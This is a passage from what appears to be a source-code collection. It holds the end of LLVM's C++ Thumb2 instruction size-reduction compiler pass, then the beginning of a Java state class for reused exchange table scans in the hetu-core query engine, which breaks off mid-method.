if (!ReduceOpcodeMap.insert(std::make_pair(FromOpc, i)).second)
llvm_unreachable("Duplicated entries?");
}
}
static bool HasImplicitCPSRDef(const MCInstrDesc &MCID) {
for (const MCPhysReg *Regs = MCID.getImplicitDefs(); *Regs; ++Regs)
if (*Regs == ARM::CPSR)
return true;
return false;
}
// Check for a likely high-latency flag def.
static bool isHighLatencyCPSR(MachineInstr *Def) {
switch(Def->getOpcode()) {
case ARM::FMSTAT:
case ARM::tMUL:
return true;
}
return false;
}
/// canAddPseudoFlagDep - For A9 (and other out-of-order) implementations,
/// the 's' 16-bit instruction partially update CPSR. Abort the
/// transformation to avoid adding false dependency on last CPSR setting
/// instruction which hurts the ability for out-of-order execution engine
/// to do register renaming magic.
/// This function checks if there is a read-of-write dependency between the
/// last instruction that defines the CPSR and the current instruction. If there
/// is, then there is no harm done since the instruction cannot be retired
/// before the CPSR setting instruction anyway.
/// Note, we are not doing full dependency analysis here for the sake of compile
/// time. We're not looking for cases like:
/// r0 = muls ...
/// r1 = add.w r0, ...
/// ...
/// = mul.w r1
/// In this case it would have been ok to narrow the mul.w to muls since there
/// are indirect RAW dependency between the muls and the mul.w
bool
Thumb2SizeReduce::canAddPseudoFlagDep(MachineInstr *Use, bool FirstInSelfLoop) {
// Disable the check for -Oz (aka OptimizeForSizeHarder).
if (MinimizeSize || !STI->avoidCPSRPartialUpdate())
return false;
if (!CPSRDef)
// If this BB loops back to itself, conservatively avoid narrowing the
// first instruction that does partial flag update.
return HighLatencyCPSR || FirstInSelfLoop;
SmallSet<unsigned, 2> Defs;
for (const MachineOperand &MO : CPSRDef->operands()) {
if (!MO.isReg() || MO.isUndef() || MO.isUse())
continue;
Register Reg = MO.getReg();
if (Reg == 0 || Reg == ARM::CPSR)
continue;
Defs.insert(Reg);
}
for (const MachineOperand &MO : Use->operands()) {
if (!MO.isReg() || MO.isUndef() || MO.isDef())
continue;
Register Reg = MO.getReg();
if (Defs.count(Reg))
return false;
}
// If the current CPSR has high latency, try to avoid the false dependency.
if (HighLatencyCPSR)
return true;
// tMOVi8 usually doesn't start long dependency chains, and there are a lot
// of them, so always shrink them when CPSR doesn't have high latency.
if (Use->getOpcode() == ARM::t2MOVi ||
Use->getOpcode() == ARM::t2MOVi16)
return false;
// No read-after-write dependency. The narrowing will add false dependency.
return true;
}
bool
Thumb2SizeReduce::VerifyPredAndCC(MachineInstr *MI, const ReduceEntry &Entry,
bool is2Addr, ARMCC::CondCodes Pred,
bool LiveCPSR, bool &HasCC, bool &CCDead) {
if ((is2Addr && Entry.PredCC2 == 0) ||
(!is2Addr && Entry.PredCC1 == 0)) {
if (Pred == ARMCC::AL) {
// Not predicated, must set CPSR.
if (!HasCC) {
// Original instruction was not setting CPSR, but CPSR is not
// currently live anyway. It's ok to set it. The CPSR def is
// dead though.
if (!LiveCPSR) {
HasCC = true;
CCDead = true;
return true;
}
return false;
}
} else {
// Predicated, must not set CPSR.
if (HasCC)
return false;
}
} else if ((is2Addr && Entry.PredCC2 == 2) ||
(!is2Addr && Entry.PredCC1 == 2)) {
/// Old opcode has an optional def of CPSR.
if (HasCC)
return true;
// If old opcode does not implicitly define CPSR, then it's not ok since
// these new opcodes' CPSR def is not meant to be thrown away. e.g. CMP.
if (!HasImplicitCPSRDef(MI->getDesc()))
return false;
HasCC = true;
} else {
// 16-bit instruction does not set CPSR.
if (HasCC)
return false;
}
return true;
}
static bool VerifyLowRegs(MachineInstr *MI) {
unsigned Opc = MI->getOpcode();
bool isPCOk = (Opc == ARM::t2LDMIA_RET || Opc == ARM::t2LDMIA_UPD);
bool isLROk = (Opc == ARM::t2STMDB_UPD);
bool isSPOk = isPCOk || isLROk;
for (unsigned i = 0, e = MI->getNumOperands(); i != e; ++i) {
const MachineOperand &MO = MI->getOperand(i);
if (!MO.isReg() || MO.isImplicit())
continue;
Register Reg = MO.getReg();
if (Reg == 0 || Reg == ARM::CPSR)
continue;
if (isPCOk && Reg == ARM::PC)
continue;
if (isLROk && Reg == ARM::LR)
continue;
if (Reg == ARM::SP) {
if (isSPOk)
continue;
if (i == 1 && (Opc == ARM::t2LDRi12 || Opc == ARM::t2STRi12))
// Special case for these ldr / str with sp as base register.
continue;
}
if (!isARMLowRegister(Reg))
return false;
}
return true;
}
bool
Thumb2SizeReduce::ReduceLoadStore(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry) {
if (ReduceLimitLdSt != -1 && ((int)NumLdSts >= ReduceLimitLdSt))
return false;
unsigned Scale = 1;
bool HasImmOffset = false;
bool HasShift = false;
bool HasOffReg = true;
bool isLdStMul = false;
unsigned Opc = Entry.NarrowOpc1;
unsigned OpNum = 3; // First 'rest' of operands.
uint8_t ImmLimit = Entry.Imm1Limit;
switch (Entry.WideOpc) {
default:
llvm_unreachable("Unexpected Thumb2 load / store opcode!");
case ARM::t2LDRi12:
case ARM::t2STRi12:
if (MI->getOperand(1).getReg() == ARM::SP) {
Opc = Entry.NarrowOpc2;
ImmLimit = Entry.Imm2Limit;
}
Scale = 4;
HasImmOffset = true;
HasOffReg = false;
break;
case ARM::t2LDRBi12:
case ARM::t2STRBi12:
HasImmOffset = true;
HasOffReg = false;
break;
case ARM::t2LDRHi12:
case ARM::t2STRHi12:
Scale = 2;
HasImmOffset = true;
HasOffReg = false;
break;
case ARM::t2LDRs:
case ARM::t2LDRBs:
case ARM::t2LDRHs:
case ARM::t2LDRSBs:
case ARM::t2LDRSHs:
case ARM::t2STRs:
case ARM::t2STRBs:
case ARM::t2STRHs:
HasShift = true;
OpNum = 4;
break;
case ARM::t2LDR_POST:
case ARM::t2STR_POST: {
if (!MinimizeSize)
return false;
if (!MI->hasOneMemOperand() ||
(*MI->memoperands_begin())->getAlign() < Align(4))
return false;
// We're creating a completely different type of load/store - LDM from LDR.
// For this reason we can't reuse the logic at the end of this function; we
// have to implement the MI building here.
bool IsStore = Entry.WideOpc == ARM::t2STR_POST;
Register Rt = MI->getOperand(IsStore ? 1 : 0).getReg();
Register Rn = MI->getOperand(IsStore ? 0 : 1).getReg();
unsigned Offset = MI->getOperand(3).getImm();
unsigned PredImm = MI->getOperand(4).getImm();
Register PredReg = MI->getOperand(5).getReg();
assert(isARMLowRegister(Rt));
assert(isARMLowRegister(Rn));
if (Offset != 4)
return false;
// Add the 16-bit load / store instruction.
DebugLoc dl = MI->getDebugLoc();
auto MIB = BuildMI(MBB, MI, dl, TII->get(Entry.NarrowOpc1))
.addReg(Rn, RegState::Define)
.addReg(Rn)
.addImm(PredImm)
.addReg(PredReg)
.addReg(Rt, IsStore ? 0 : RegState::Define);
// Transfer memoperands.
MIB.setMemRefs(MI->memoperands());
// Transfer MI flags.
MIB.setMIFlags(MI->getFlags());
// Kill the old instruction.
MI->eraseFromBundle();
++NumLdSts;
return true;
}
case ARM::t2LDMIA: {
Register BaseReg = MI->getOperand(0).getReg();
assert(isARMLowRegister(BaseReg));
// For the non-writeback version (this one), the base register must be
// one of the registers being loaded.
bool isOK = false;
for (unsigned i = 3; i < MI->getNumOperands(); ++i) {
if (MI->getOperand(i).getReg() == BaseReg) {
isOK = true;
break;
}
}
if (!isOK)
return false;
OpNum = 0;
isLdStMul = true;
break;
}
case ARM::t2STMIA: {
// t2STMIA is reduced to tSTMIA_UPD which has writeback. We can only do this
// if the base register is killed, as then it doesn't matter what its value
// is after the instruction.
if (!MI->getOperand(0).isKill())
return false;
// If the base register is in the register list and isn't the lowest
// numbered register (i.e. it's in operand 4 onwards) then with writeback
// the stored value is unknown, so we can't convert to tSTMIA_UPD.
Register BaseReg = MI->getOperand(0).getReg();
for (unsigned i = 4; i < MI->getNumOperands(); ++i)
if (MI->getOperand(i).getReg() == BaseReg)
return false;
break;
}
case ARM::t2LDMIA_RET: {
Register BaseReg = MI->getOperand(1).getReg();
if (BaseReg != ARM::SP)
return false;
Opc = Entry.NarrowOpc2; // tPOP_RET
OpNum = 2;
isLdStMul = true;
break;
}
case ARM::t2LDMIA_UPD:
case ARM::t2STMIA_UPD:
case ARM::t2STMDB_UPD: {
OpNum = 0;
Register BaseReg = MI->getOperand(1).getReg();
if (BaseReg == ARM::SP &&
(Entry.WideOpc == ARM::t2LDMIA_UPD ||
Entry.WideOpc == ARM::t2STMDB_UPD)) {
Opc = Entry.NarrowOpc2; // tPOP or tPUSH
OpNum = 2;
} else if (!isARMLowRegister(BaseReg) ||
(Entry.WideOpc != ARM::t2LDMIA_UPD &&
Entry.WideOpc != ARM::t2STMIA_UPD)) {
return false;
}
isLdStMul = true;
break;
}
}
unsigned OffsetReg = 0;
bool OffsetKill = false;
bool OffsetInternal = false;
if (HasShift) {
OffsetReg = MI->getOperand(2).getReg();
OffsetKill = MI->getOperand(2).isKill();
OffsetInternal = MI->getOperand(2).isInternalRead();
if (MI->getOperand(3).getImm())
// Thumb1 addressing mode doesn't support shift.
return false;
}
unsigned OffsetImm = 0;
if (HasImmOffset) {
OffsetImm = MI->getOperand(2).getImm();
unsigned MaxOffset = ((1 << ImmLimit) - 1) * Scale;
if ((OffsetImm & (Scale - 1)) || OffsetImm > MaxOffset)
// Make sure the immediate field fits.
return false;
}
// Add the 16-bit load / store instruction.
DebugLoc dl = MI->getDebugLoc();
MachineInstrBuilder MIB = BuildMI(MBB, MI, dl, TII->get(Opc));
// tSTMIA_UPD takes a defining register operand. We've already checked that
// the register is killed, so mark it as dead here.
if (Entry.WideOpc == ARM::t2STMIA)
MIB.addReg(MI->getOperand(0).getReg(), RegState::Define | RegState::Dead);
if (!isLdStMul) {
MIB.add(MI->getOperand(0));
MIB.add(MI->getOperand(1));
if (HasImmOffset)
MIB.addImm(OffsetImm / Scale);
assert((!HasShift || OffsetReg) && "Invalid so_reg load / store address!");
if (HasOffReg)
MIB.addReg(OffsetReg, getKillRegState(OffsetKill) |
getInternalReadRegState(OffsetInternal));
}
// Transfer the rest of operands.
for (unsigned e = MI->getNumOperands(); OpNum != e; ++OpNum)
MIB.add(MI->getOperand(OpNum));
// Transfer memoperands.
MIB.setMemRefs(MI->memoperands());
// Transfer MI flags.
MIB.setMIFlags(MI->getFlags());
LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
<< " to 16-bit: " << *MIB);
MBB.erase_instr(MI);
++NumLdSts;
return true;
}
bool
Thumb2SizeReduce::ReduceSpecial(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry,
bool LiveCPSR, bool IsSelfLoop) {
unsigned Opc = MI->getOpcode();
if (Opc == ARM::t2ADDri) {
// If the source register is SP, try to reduce to tADDrSPi, otherwise
// it's a normal reduce.
if (MI->getOperand(1).getReg() != ARM::SP) {
if (ReduceTo2Addr(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
return true;
return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
}
// Try to reduce to tADDrSPi.
unsigned Imm = MI->getOperand(2).getImm();
// The immediate must be in range, the destination register must be a low
// reg, the predicate must be "always" and the condition flags must not
// be being set.
if (Imm & 3 || Imm > 1020)
return false;
if (!isARMLowRegister(MI->getOperand(0).getReg()))
return false;
if (MI->getOperand(3).getImm() != ARMCC::AL)
return false;
const MCInstrDesc &MCID = MI->getDesc();
if (MCID.hasOptionalDef() &&
MI->getOperand(MCID.getNumOperands()-1).getReg() == ARM::CPSR)
return false;
MachineInstrBuilder MIB =
BuildMI(MBB, MI, MI->getDebugLoc(),
TII->get(ARM::tADDrSPi))
.add(MI->getOperand(0))
.add(MI->getOperand(1))
.addImm(Imm / 4) // The tADDrSPi has an implied scale by four.
.add(predOps(ARMCC::AL));
// Transfer MI flags.
MIB.setMIFlags(MI->getFlags());
LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
<< " to 16-bit: " << *MIB);
MBB.erase_instr(MI);
++NumNarrows;
return true;
}
if (Entry.LowRegs1 && !VerifyLowRegs(MI))
return false;
if (MI->mayLoadOrStore())
return ReduceLoadStore(MBB, MI, Entry);
switch (Opc) {
default: break;
case ARM::t2ADDSri:
case ARM::t2ADDSrr: {
Register PredReg;
if (getInstrPredicate(*MI, PredReg) == ARMCC::AL) {
switch (Opc) {
default: break;
case ARM::t2ADDSri:
if (ReduceTo2Addr(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
return true;
LLVM_FALLTHROUGH;
case ARM::t2ADDSrr:
return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
}
}
break;
}
case ARM::t2RSBri:
case ARM::t2RSBSri:
case ARM::t2SXTB:
case ARM::t2SXTH:
case ARM::t2UXTB:
case ARM::t2UXTH:
if (MI->getOperand(2).getImm() == 0)
return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
break;
case ARM::t2MOVi16:
// Can convert only 'pure' immediate operands, not immediates obtained as
// globals' addresses.
if (MI->getOperand(1).isImm())
return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
break;
case ARM::t2CMPrr: {
// Try to reduce to the lo-reg only version first. Why there are two
// versions of the instruction is a mystery.
// It would be nice to just have two entries in the master table that
// are prioritized, but the table assumes a unique entry for each
// source insn opcode. So for now, we hack a local entry record to use.
static const ReduceEntry NarrowEntry =
{ ARM::t2CMPrr,ARM::tCMPr, 0, 0, 0, 1, 1,2, 0, 0,1,0 };
if (ReduceToNarrow(MBB, MI, NarrowEntry, LiveCPSR, IsSelfLoop))
return true;
return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
}
case ARM::t2TEQrr: {
Register PredReg;
// Can only convert to eors if we're not in an IT block.
if (getInstrPredicate(*MI, PredReg) != ARMCC::AL)
break;
// TODO if Operand 0 is not killed but Operand 1 is, then we could write
// to Op1 instead.
if (MI->getOperand(0).isKill())
return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
}
}
return false;
}
bool
Thumb2SizeReduce::ReduceTo2Addr(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry,
bool LiveCPSR, bool IsSelfLoop) {
if (ReduceLimit2Addr != -1 && ((int)Num2Addrs >= ReduceLimit2Addr))
return false;
if (!OptimizeSize && Entry.AvoidMovs && STI->avoidMOVsShifterOperand())
// Don't issue movs with shifter operand for some CPUs unless we
// are optimizing for size.
return false;
Register Reg0 = MI->getOperand(0).getReg();
Register Reg1 = MI->getOperand(1).getReg();
// t2MUL is "special". The tied source operand is second, not first.
if (MI->getOpcode() == ARM::t2MUL) {
Register Reg2 = MI->getOperand(2).getReg();
// Early exit if the regs aren't all low regs.
if (!isARMLowRegister(Reg0) || !isARMLowRegister(Reg1)
|| !isARMLowRegister(Reg2))
return false;
if (Reg0 != Reg2) {
// If the other operand also isn't the same as the destination, we
// can't reduce.
if (Reg1 != Reg0)
return false;
// Try to commute the operands to make it a 2-address instruction.
MachineInstr *CommutedMI = TII->commuteInstruction(*MI);
if (!CommutedMI)
return false;
}
} else if (Reg0 != Reg1) {
// Try to commute the operands to make it a 2-address instruction.
unsigned CommOpIdx1 = 1;
unsigned CommOpIdx2 = TargetInstrInfo::CommuteAnyOperandIndex;
if (!TII->findCommutedOpIndices(*MI, CommOpIdx1, CommOpIdx2) ||
MI->getOperand(CommOpIdx2).getReg() != Reg0)
return false;
MachineInstr *CommutedMI =
TII->commuteInstruction(*MI, false, CommOpIdx1, CommOpIdx2);
if (!CommutedMI)
return false;
}
if (Entry.LowRegs2 && !isARMLowRegister(Reg0))
return false;
if (Entry.Imm2Limit) {
unsigned Imm = MI->getOperand(2).getImm();
unsigned Limit = (1 << Entry.Imm2Limit) - 1;
if (Imm > Limit)
return false;
} else {
Register Reg2 = MI->getOperand(2).getReg();
if (Entry.LowRegs2 && !isARMLowRegister(Reg2))
return false;
}
// Check if it's possible / necessary to transfer the predicate.
const MCInstrDesc &NewMCID = TII->get(Entry.NarrowOpc2);
Register PredReg;
ARMCC::CondCodes Pred = getInstrPredicate(*MI, PredReg);
bool SkipPred = false;
if (Pred != ARMCC::AL) {
if (!NewMCID.isPredicable())
// Can't transfer predicate, fail.
return false;
} else {
SkipPred = !NewMCID.isPredicable();
}
bool HasCC = false;
bool CCDead = false;
const MCInstrDesc &MCID = MI->getDesc();
if (MCID.hasOptionalDef()) {
unsigned NumOps = MCID.getNumOperands();
HasCC = (MI->getOperand(NumOps-1).getReg() == ARM::CPSR);
if (HasCC && MI->getOperand(NumOps-1).isDead())
CCDead = true;
}
if (!VerifyPredAndCC(MI, Entry, true, Pred, LiveCPSR, HasCC, CCDead))
return false;
// Avoid adding a false dependency on partial flag update by some 16-bit
// instructions which has the 's' bit set.
if (Entry.PartFlag && NewMCID.hasOptionalDef() && HasCC &&
canAddPseudoFlagDep(MI, IsSelfLoop))
return false;
// Add the 16-bit instruction.
DebugLoc dl = MI->getDebugLoc();
MachineInstrBuilder MIB = BuildMI(MBB, MI, dl, NewMCID);
MIB.add(MI->getOperand(0));
if (NewMCID.hasOptionalDef())
MIB.add(HasCC ? t1CondCodeOp(CCDead) : condCodeOp());
// Transfer the rest of operands.
unsigned NumOps = MCID.getNumOperands();
for (unsigned i = 1, e = MI->getNumOperands(); i != e; ++i) {
if (i < NumOps && MCID.OpInfo[i].isOptionalDef())
continue;
if (SkipPred && MCID.OpInfo[i].isPredicate())
continue;
MIB.add(MI->getOperand(i));
}
// Transfer MI flags.
MIB.setMIFlags(MI->getFlags());
LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
<< " to 16-bit: " << *MIB);
MBB.erase_instr(MI);
++Num2Addrs;
return true;
}
bool
Thumb2SizeReduce::ReduceToNarrow(MachineBasicBlock &MBB, MachineInstr *MI,
const ReduceEntry &Entry,
bool LiveCPSR, bool IsSelfLoop) {
if (ReduceLimit != -1 && ((int)NumNarrows >= ReduceLimit))
return false;
if (!OptimizeSize && Entry.AvoidMovs && STI->avoidMOVsShifterOperand())
// Don't issue movs with shifter operand for some CPUs unless we
// are optimizing for size.
return false;
unsigned Limit = ~0U;
if (Entry.Imm1Limit)
Limit = (1 << Entry.Imm1Limit) - 1;
const MCInstrDesc &MCID = MI->getDesc();
for (unsigned i = 0, e = MCID.getNumOperands(); i != e; ++i) {
if (MCID.OpInfo[i].isPredicate())
continue;
const MachineOperand &MO = MI->getOperand(i);
if (MO.isReg()) {
Register Reg = MO.getReg();
if (!Reg || Reg == ARM::CPSR)
continue;
if (Entry.LowRegs1 && !isARMLowRegister(Reg))
return false;
} else if (MO.isImm() &&
!MCID.OpInfo[i].isPredicate()) {
if (((unsigned)MO.getImm()) > Limit)
return false;
}
}
// Check if it's possible / necessary to transfer the predicate.
const MCInstrDesc &NewMCID = TII->get(Entry.NarrowOpc1);
Register PredReg;
ARMCC::CondCodes Pred = getInstrPredicate(*MI, PredReg);
bool SkipPred = false;
if (Pred != ARMCC::AL) {
if (!NewMCID.isPredicable())
// Can't transfer predicate, fail.
return false;
} else {
SkipPred = !NewMCID.isPredicable();
}
bool HasCC = false;
bool CCDead = false;
if (MCID.hasOptionalDef()) {
unsigned NumOps = MCID.getNumOperands();
HasCC = (MI->getOperand(NumOps-1).getReg() == ARM::CPSR);
if (HasCC && MI->getOperand(NumOps-1).isDead())
CCDead = true;
}
if (!VerifyPredAndCC(MI, Entry, false, Pred, LiveCPSR, HasCC, CCDead))
return false;
// Avoid adding a false dependency on partial flag update by some 16-bit
// instructions which has the 's' bit set.
if (Entry.PartFlag && NewMCID.hasOptionalDef() && HasCC &&
canAddPseudoFlagDep(MI, IsSelfLoop))
return false;
// Add the 16-bit instruction.
DebugLoc dl = MI->getDebugLoc();
MachineInstrBuilder MIB = BuildMI(MBB, MI, dl, NewMCID);
// TEQ is special in that it doesn't define a register but we're converting
// it into an EOR which does. So add the first operand as a def and then
// again as a use.
if (MCID.getOpcode() == ARM::t2TEQrr) {
MIB.add(MI->getOperand(0));
MIB->getOperand(0).setIsKill(false);
MIB->getOperand(0).setIsDef(true);
MIB->getOperand(0).setIsDead(true);
if (NewMCID.hasOptionalDef())
MIB.add(HasCC ? t1CondCodeOp(CCDead) : condCodeOp());
MIB.add(MI->getOperand(0));
} else {
MIB.add(MI->getOperand(0));
if (NewMCID.hasOptionalDef())
MIB.add(HasCC ? t1CondCodeOp(CCDead) : condCodeOp());
}
// Transfer the rest of operands.
unsigned NumOps = MCID.getNumOperands();
for (unsigned i = 1, e = MI->getNumOperands(); i != e; ++i) {
if (i < NumOps && MCID.OpInfo[i].isOptionalDef())
continue;
if ((MCID.getOpcode() == ARM::t2RSBSri ||
MCID.getOpcode() == ARM::t2RSBri ||
MCID.getOpcode() == ARM::t2SXTB ||
MCID.getOpcode() == ARM::t2SXTH ||
MCID.getOpcode() == ARM::t2UXTB ||
MCID.getOpcode() == ARM::t2UXTH) && i == 2)
// Skip the zero immediate operand, it's now implicit.
continue;
bool isPred = (i < NumOps && MCID.OpInfo[i].isPredicate());
if (SkipPred && isPred)
continue;
const MachineOperand &MO = MI->getOperand(i);
if (MO.isReg() && MO.isImplicit() && MO.getReg() == ARM::CPSR)
// Skip implicit def of CPSR. Either it's modeled as an optional
// def now or it's already an implicit def on the new instruction.
continue;
MIB.add(MO);
}
if (!MCID.isPredicable() && NewMCID.isPredicable())
MIB.add(predOps(ARMCC::AL));
// Transfer MI flags.
MIB.setMIFlags(MI->getFlags());
LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
<< " to 16-bit: " << *MIB);
MBB.erase_instr(MI);
++NumNarrows;
return true;
}
static bool UpdateCPSRDef(MachineInstr &MI, bool LiveCPSR, bool &DefCPSR) {
bool HasDef = false;
for (const MachineOperand &MO : MI.operands()) {
if (!MO.isReg() || MO.isUndef() || MO.isUse())
continue;
if (MO.getReg() != ARM::CPSR)
continue;
DefCPSR = true;
if (!MO.isDead())
HasDef = true;
}
return HasDef || LiveCPSR;
}
static bool UpdateCPSRUse(MachineInstr &MI, bool LiveCPSR) {
for (const MachineOperand &MO : MI.operands()) {
if (!MO.isReg() || MO.isUndef() || MO.isDef())
continue;
if (MO.getReg() != ARM::CPSR)
continue;
assert(LiveCPSR && "CPSR liveness tracking is wrong!");
if (MO.isKill()) {
LiveCPSR = false;
break;
}
}
return LiveCPSR;
}
bool Thumb2SizeReduce::ReduceMI(MachineBasicBlock &MBB, MachineInstr *MI,
bool LiveCPSR, bool IsSelfLoop) {
unsigned Opcode = MI->getOpcode();
DenseMap<unsigned, unsigned>::iterator OPI = ReduceOpcodeMap.find(Opcode);
if (OPI == ReduceOpcodeMap.end())
return false;
const ReduceEntry &Entry = ReduceTable[OPI->second];
// Don't attempt normal reductions on "special" cases for now.
if (Entry.Special)
return ReduceSpecial(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
// Try to transform to a 16-bit two-address instruction.
if (Entry.NarrowOpc2 &&
ReduceTo2Addr(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
return true;
// Try to transform to a 16-bit non-two-address instruction.
if (Entry.NarrowOpc1 &&
ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
return true;
return false;
}
bool Thumb2SizeReduce::ReduceMBB(MachineBasicBlock &MBB) {
bool Modified = false;
// Yes, CPSR could be livein.
bool LiveCPSR = MBB.isLiveIn(ARM::CPSR);
MachineInstr *BundleMI = nullptr;
CPSRDef = nullptr;
HighLatencyCPSR = false;
// Check predecessors for the latest CPSRDef.
for (auto *Pred : MBB.predecessors()) {
const MBBInfo &PInfo = BlockInfo[Pred->getNumber()];
if (!PInfo.Visited) {
// Since blocks are visited in RPO, this must be a back-edge.
continue;
}
if (PInfo.HighLatencyCPSR) {
HighLatencyCPSR = true;
break;
}
}
// If this BB loops back to itself, conservatively avoid narrowing the
// first instruction that does partial flag update.
bool IsSelfLoop = MBB.isSuccessor(&MBB);
MachineBasicBlock::instr_iterator MII = MBB.instr_begin(),E = MBB.instr_end();
MachineBasicBlock::instr_iterator NextMII;
for (; MII != E; MII = NextMII) {
NextMII = std::next(MII);
MachineInstr *MI = &*MII;
if (MI->isBundle()) {
BundleMI = MI;
continue;
}
if (MI->isDebugInstr())
continue;
LiveCPSR = UpdateCPSRUse(*MI, LiveCPSR);
// Does NextMII belong to the same bundle as MI?
bool NextInSameBundle = NextMII != E && NextMII->isBundledWithPred();
if (ReduceMI(MBB, MI, LiveCPSR, IsSelfLoop)) {
Modified = true;
MachineBasicBlock::instr_iterator I = std::prev(NextMII);
MI = &*I;
// Removing and reinserting the first instruction in a bundle will break
// up the bundle. Fix the bundling if it was broken.
if (NextInSameBundle && !NextMII->isBundledWithPred())
NextMII->bundleWithPred();
}
if (BundleMI && !NextInSameBundle && MI->isInsideBundle()) {
// FIXME: Since post-ra scheduler operates on bundles, the CPSR kill
// marker is only on the BUNDLE instruction. Process the BUNDLE
// instruction as we finish with the bundled instruction to work around
// the inconsistency.
if (BundleMI->killsRegister(ARM::CPSR))
LiveCPSR = false;
MachineOperand *MO = BundleMI->findRegisterDefOperand(ARM::CPSR);
if (MO && !MO->isDead())
LiveCPSR = true;
MO = BundleMI->findRegisterUseOperand(ARM::CPSR);
if (MO && !MO->isKill())
LiveCPSR = true;
}
bool DefCPSR = false;
LiveCPSR = UpdateCPSRDef(*MI, LiveCPSR, DefCPSR);
if (MI->isCall()) {
// Calls don't really set CPSR.
CPSRDef = nullptr;
HighLatencyCPSR = false;
IsSelfLoop = false;
} else if (DefCPSR) {
// This is the last CPSR defining instruction.
CPSRDef = MI;
HighLatencyCPSR = isHighLatencyCPSR(CPSRDef);
IsSelfLoop = false;
}
}
MBBInfo &Info = BlockInfo[MBB.getNumber()];
Info.HighLatencyCPSR = HighLatencyCPSR;
Info.Visited = true;
return Modified;
}
bool Thumb2SizeReduce::runOnMachineFunction(MachineFunction &MF) {
if (PredicateFtor && !PredicateFtor(MF.getFunction()))
return false;
STI = &static_cast<const ARMSubtarget &>(MF.getSubtarget());
if (STI->isThumb1Only() || STI->prefers32BitThumb())
return false;
TII = static_cast<const Thumb2InstrInfo *>(STI->getInstrInfo());
// Optimizing / minimizing size? Minimizing size implies optimizing for size.
OptimizeSize = MF.getFunction().hasOptSize();
MinimizeSize = STI->hasMinSize();
BlockInfo.clear();
BlockInfo.resize(MF.getNumBlockIDs());
// Visit blocks in reverse post-order so LastCPSRDef is known for all
// predecessors.
ReversePostOrderTraversal<MachineFunction*> RPOT(&MF);
bool Modified = false;
for (ReversePostOrderTraversal<MachineFunction*>::rpo_iterator
I = RPOT.begin(), E = RPOT.end(); I != E; ++I)
Modified |= ReduceMBB(**I);
return Modified;
}
/// createThumb2SizeReductionPass - Returns an instance of the Thumb2 size
/// reduction pass.
FunctionPass *llvm::createThumb2SizeReductionPass(
std::function<bool(const Function &)> Ftor) {
return new Thumb2SizeReduce(std::move(Ftor));
}
| 18,487 |
476 | <reponame>tejasvinu/hetu-core
/*
* Copyright (C) 2018-2021. Huawei Technologies Co., Ltd. All rights reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.prestosql.operator;
import io.prestosql.spi.Page;
import io.prestosql.spi.operator.ReuseExchangeOperator;
import io.prestosql.spiller.Spiller;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
import java.util.UUID;
import java.util.concurrent.ConcurrentLinkedQueue;
import static io.prestosql.spi.operator.ReuseExchangeOperator.STRATEGY.REUSE_STRATEGY_PRODUCER;
public class ReuseExchangeTableScanMappingIdState
{
private ReuseExchangeOperator.STRATEGY strategy;
private UUID reuseTableScanMappingId;
private List<Page> pageCaches;
private List<Page> pagesToSpill;
private ConcurrentLinkedQueue<String> sourceNodeModifiedIdList;
private Optional<Spiller> spiller;
private int pagesWritten;
private int curConsumerScanNodeRefCount;
private int totalConsumerScanNodeCount;
private OperatorContext operatorContext;
public boolean cacheUpdateInProgress;
public ReuseExchangeTableScanMappingIdState(ReuseExchangeOperator.STRATEGY strategy, UUID reuseTableScanMappingId, OperatorContext operatorContext, int curConsumerScanNodeRefCount)
{
this.strategy = strategy;
this.reuseTableScanMappingId = reuseTableScanMappingId;
if (strategy.equals(REUSE_STRATEGY_PRODUCER)) {
this.operatorContext = operatorContext;
this.curConsumerScanNodeRefCount = curConsumerScanNodeRefCount;
this.totalConsumerScanNodeCount = curConsumerScanNodeRefCount;
pagesWritten = 0;
}
pageCaches = new ArrayList<>();
pagesToSpill = new ArrayList<>();
sourceNodeModifiedIdList = new ConcurrentLinkedQueue<>();
spiller = Optional.empty();
cacheUpdateInProgress = false;
}
public ReuseExchangeOperator.STRATEGY getStrategy()
{
return strategy;
}
public void setStrategy(ReuseExchangeOperator.STRATEGY strategy)
{
this.strategy = strategy;
}
public UUID getReuseTableScanMappingId()
{
return reuseTableScanMappingId;
}
public void setReuseTableScanMappingId(UUID reuseTableScanMappingId)
{
this.reuseTableScanMappingId = reuseTableScanMappingId;
}
public List<Page> getPageCaches()
{
return pageCaches;
}
public void setPageCaches(List<Page> pageCaches)
{
this.pageCaches = pageCaches;
}
public List<Page> getPagesToSpill()
{
return pagesToSpill;
}
public void setPagesToSpill(List<Page> pagesToSpill)
{
this.pagesToSpill = pagesToSpill;
}
public ConcurrentLinkedQueue<String> getSourceNodeModifiedIdList()
{
return sourceNodeModifiedIdList;
}
public void setSourceNodeModifiedIdList(ConcurrentLinkedQueue<String> sourceNodeModifiedIdList)
{
this.sourceNodeModifiedIdList = sourceNodeModifiedIdList;
}
public void addToSourceNodeModifiedIdList(String sourceNodeModifiedId)
{
